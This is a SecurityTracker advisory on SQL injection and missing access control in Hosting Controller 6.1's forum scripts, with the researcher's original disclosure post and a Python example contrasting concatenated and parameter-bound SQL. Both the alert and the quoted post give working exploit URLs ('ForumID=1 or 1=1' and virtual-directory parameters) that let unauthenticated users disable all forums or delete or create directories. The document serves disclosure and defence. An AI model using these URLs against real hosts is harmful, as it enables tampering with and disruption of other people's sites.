Hosting Controller 'EnableForum.asp' and 'DisableForum.asp' Scripts Let Remote Users Create or Delete Forums and Virtual Directories

SecurityTracker Alert ID: 1017103
SecurityTracker URL: http://securitytracker.com/id?1017103
CVE Reference: CVE-2006-5629, CVE-2006-5630
Updated: Jun 2 2008
Original Entry Date: Oct 20 2006
Impact: Denial of service via network, Disclosure of system information, Disclosure of user information, Modification of user information, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 6.1 Hotfix 3.2 and prior versions

Description: Soroush Dalili of Kapda and GSG reported several vulnerabilities in Hosting Controller. A remote user can create or delete forums and virtual directories.

The 'EnableForum.asp' and 'DisableForum.asp' scripts do not properly validate user-supplied input in the 'ForumID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. This can be exploited to enable or delete arbitrary forums.

Some demonstration exploit URLs are provided:

/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1

A remote user can also delete and create arbitrary virtual directories.

Some demonstration exploit URLs are provided:

/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=

The original advisory is available at:
http://www.kapda.ir/advisory-442.html
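
The 'ForumID' case described above, as an added example that is not Hosting Controller's code and not part of the advisory: it shows why a numeric parameter concatenated into SQL lets one request change every row, beside a handler that checks authentication, validates the integer and binds it. The product's real schema and query are not on this page, so the `forums` table, its columns and the function names are assumptions, and the data is constructed.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data; the table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE forums (forum_id INTEGER PRIMARY KEY, enabled INTEGER)")
    db.executemany("INSERT INTO forums VALUES (?, 1)", [(1,), (2,), (3,)])
    return db


def enabled_count(db):
    return db.execute("SELECT COUNT(*) FROM forums WHERE enabled = 1").fetchone()[0]


def disable_forum_concat(db, forum_id):
    # Flawed pattern: the query-string value becomes part of the SQL text, so
    # "1 or 1=1" widens the WHERE clause. No quote is needed in a numeric
    # context, which is why quote escaping alone does not fix it.
    cur = db.execute("UPDATE forums SET enabled = 0 WHERE forum_id = " + forum_id)
    return cur.rowcount


def disable_forum_checked(db, forum_id, authenticated):
    # Corrected pattern, covering both causes the alert lists:
    # access control first, then input validation, then a bound parameter.
    if not authenticated:
        raise PermissionError("login required")
    if not re.fullmatch(r"[0-9]{1,9}", forum_id):
        raise ValueError("ForumID must be a plain integer")
    cur = db.execute("UPDATE forums SET enabled = 0 WHERE forum_id = ?", (int(forum_id),))
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", disable_forum_concat(db, "1 or 1=1"), "rows changed")
    db = make_db()
    print("bound:", disable_forum_checked(db, "1", True), "row changed")
    try:
        disable_forum_checked(db, "1 or 1=1", True)
    except ValueError as exc:
        print("rejected:", exc)
```
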

Impact: A remote user can execute SQL commands on the underlying database to enable or delete forums. A remote user can create or delete arbitrary virtual directories.
Solution: The vendor has issued a fix (6.1 Hotfix 3.3).
Vendor URL: www.hostingcontroller.com
Cause: Access control error, Input validation error
Underlying OS: Windows (Any)
Reported By: s d <irsdl@yahoo.com>
Message History: None.

Source Message Contents

Date: Fri, 20 Oct 2006 03:08:38 -0700 (PDT)
From: s d <irsdl@yahoo.com>
Subject: Hosting Controller 6.1 Hotfix <= 3.2 Multiple Vulnerabilities
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2 Multiple Vulnerabilities
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory .
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test& ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test& ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
Solution:
--------------------
Update to version Hotfix 3.3
Original Advisory:
--------------------
http://www.kapda.ir/advisory-442.html
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Institute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]